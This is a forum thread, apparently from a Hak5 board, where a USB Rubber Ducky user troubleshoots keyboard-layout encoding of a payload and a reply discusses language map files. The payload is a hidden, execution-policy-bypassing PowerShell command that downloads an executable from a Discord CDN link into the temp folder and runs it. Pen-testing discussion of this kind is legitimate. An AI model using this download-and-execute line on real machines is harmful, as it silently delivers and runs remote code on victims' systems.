Jump to content

Payload powershell wget execute

Recommended Posts

Hello im a newb to usb rubber ducky,I received mine 4 days ago for pen testing, and I have a small problem with the STRING code.

Here the code bellow I used.

STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/796873244677242910/calc.exe',\"$env:temp\calc.exe\"); Start-Process \"$env:temp\calc.exe\""


When executed in a notepad.exe ,I get this code with alot of @ and #


powershell -NoP -NonI -W Hidden -Exec Bypass @IEX (New-Object System.Net.WebClient).DownloadFile(<https:##cdn.discordapp.com#attachments#777729234181029919#796873244677242910#calc.exe<,@$env:tempbob.exe@); Start-Process @$env:tempbob.exe@@

What im doing wrong? can someone help




Link to comment
Share on other sites

I own corsair k70 keyboard

Everything look good using the ca-fr.json on https://shop.hak5.org/pages/ducky-encoder except one thing the usb rubber ducky does not recognize this key

---> "  
the ducky remplace it for this key --->\  

powershell -NoP -NonI -W Hidden -Exec Bypass \IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\\$env:temp\12345.exe\\); Start-Process \\$env:temp\12345.exe\\\ after the execution that the code missing alots of "

Ducky must click on Shift and this one surronded in red ,but click on shift + \ the left key beside 1 key


Orignal code
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/777729234181029919/797350378844848148/calc.exe',\"$env:temp\12345.exe\"); Start-Process \"$env:temp\12345.exe\""


Link to comment
Share on other sites

So, even if something is still not correct, something has changed between your first an last post; @ has become \, what did you change? Forward slashes / also seems to have been changed to now be correct (was previously the # char in the first post), also < seems to be correct as it's ' in the latest example of your output.

Also not sure what keyboard layout you have in the screenshot of your On-Screen Keyboard. I configured one of my Windows 10 boxes for Canadian French and Canadian-French (Legacy) and none of them showed the mapping you have captured in your screen shot. Your physical keyboard doesn't matter, btw. I used the chars that gives you problems with other keyboard layouts and I have no problems running my payloads that contains those chars. Perhaps the ca-fr.json language map file isn't all correct?

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...